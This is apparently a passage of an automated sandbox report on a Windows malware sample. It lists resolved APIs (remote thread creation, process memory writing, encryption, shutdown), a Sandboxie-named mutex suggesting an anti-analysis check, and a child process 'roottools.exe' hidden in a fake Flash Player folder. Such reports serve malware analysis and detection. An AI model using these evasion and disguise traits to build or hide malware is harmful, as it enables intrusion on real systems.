Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x772e742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a07a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a2830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75a03e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x75a0195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x75a1d851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x75a25c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x75a2c7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a8416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a8414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a841df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a840fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a05371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75a0418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x75a044ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a23b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75a01b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a017d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x772a2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x75a0465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a0192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75a1d4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a01986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x75a04407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x75a0111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77292270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a04950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75a1ecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a844cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a01856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x75a04173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x772922b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75a01b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75a04442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x75a015d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x75a1d4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a014c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75a04a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x75a1d9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75a059e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x75a01462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75a1c860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a04259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a034c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a034b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a01222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a0492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75a28baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75a2896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a2735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a03f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75a0424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x75a016dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x75a016c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a0183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a01136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x75a04220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a0110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a0186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x757b49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x757b8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x757afbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x757b1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x772a25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x757a8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x757a9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x757b2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x757b3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75801a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x757a7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757b05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x757a787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x757ab17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x757b6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x757ad156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x757af350	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x758dd718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x756f469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x756f45f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7570779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x756f0e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x756f40e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x756f0e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x756f2a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x756f40fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x756ec54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x756e9fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x756ef4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x756edf4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x756edf36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x756f4680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x756f14d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x756edf66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x756f4304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x756f412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x756f4620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x756f468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x756ec532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x756f432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x756f46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x756ee124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x756f431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x756ec51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x756f418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x756f415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x756f4608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x756f41b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x756f413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x756ecf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7570773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x756ee15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x756f46e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x756f445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7573db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x756edf14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x75c63c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75c71e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x75cd5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x750e45bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x750e55bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x7510cd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x750e4745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x7510d32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x750e46e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x750e86f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x750ec39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x750e3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x750ec177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x7511066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x750e5331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x750ffbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x750ea1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x750dfcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x750fedfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x750dff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x750e5c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x750fc6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x7510ce21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x74eb13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x7546e599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x754909ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x7547363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75465ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75499d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x754986d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x75145689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x75144de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7514e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x751454f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x75144f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x75145f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x75145ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x751458b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x753749e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7536b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x7536a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75361b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75374c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x7535d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x753675e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7537f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7536ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x753e18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x76c71d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76b63eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x74dea415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtCreateFile, address_out = 0x772900a4	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtClose, address_out = 0x7728f9d0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryEaFile, address_out = 0x77291314	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtSetEaFile, address_out = 0x772919b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = wine_get_unix_file_name, address_out = 0x0	1	Fn

Window (5)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Langskallet7	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 2302108	1	Fn

Keyboard (3)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn
Get Info	type = KB_LOCALE_ID		2	Fn

System (161)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	2	Fn
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 0 milliseconds (0.000 seconds)	112	Fn
Sleep	duration = -1 (infinite)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:49 (UTC)	4	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (7)

Operation	Additional Information	Count	Logfile
Create	-	1	Fn
Create	mutex_name = 9B4D68961731FE3C22DA08B640799EB6	1	Fn
Create	mutex_name = Sandboxie_SingleInstanceMutex_Control	1	Fn
Create	mutex_name = Frz_State	1	Fn
Open	mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE	2	Fn
Release	mutex_name = 9B4D68961731FE3C22DA08B640799EB6	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data
Get Environment String	name = ComSpec, result_out = C:\Windows\system32\cmd.exe		1	Fn

Process #7: roottools.exe

(Host: 674, Network: 0)

Information	Value
ID	#7
File Name	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:01:23, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:08:50

OS Process Information

Information	Value
PID	0x7a8
Parent PID	0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 97C 0x 980 0x 24C 0x 184

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x002affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x00247fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002a0000	0x002a0000	0x002affff	Private Memory	Readable, Writable	Region Actions Download Dump
rsaenh.dll	0x002b0000	0x002ebfff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000002b0000	0x002b0000	0x002b0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002f0000	0x002f0000	0x0036ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	Readable, Writable	Region Actions Download Dump
roottools.exe	0x00400000	0x00432fff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000440000	0x00440000	0x0057ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000440000	0x00440000	0x0051efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000540000	0x00540000	0x0057ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000590000	0x00590000	0x0068ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000690000	0x00690000	0x00817fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000860000	0x00860000	0x0086ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000870000	0x00870000	0x009f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a00000	0x00a00000	0x01dfffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e00000	0x01e00000	0x021fffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x02200000	0x024cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000024d0000	0x024d0000	0x026fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000024d0000	0x024d0000	0x0263ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000024d0000	0x024d0000	0x0253ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002540000	0x02540000	0x0257ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002600000	0x02600000	0x0263ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000026c0000	0x026c0000	0x026fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002700000	0x02700000	0x02af2fff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02b00000	0x0342ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003430000	0x03430000	0x0352ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003530000	0x03530000	0x0b52ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000000000b530000	0x0b530000	0x0b79ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000b7a0000	0x0b7a0000	0x0b89ffff	Private Memory	Readable, Writable	Region Actions
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74640000	0x74652fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x74660000	0x746dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746f0000	0x746f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x74700000	0x7475bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74760000	0x7479efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74880000	0x748bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x748c0000	0x748d5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x748e0000	0x748e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x748f0000	0x74901fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x74910000	0x74916fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74920000	0x7493bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x74940000	0x7499efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x74eb0000	0x74eb4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
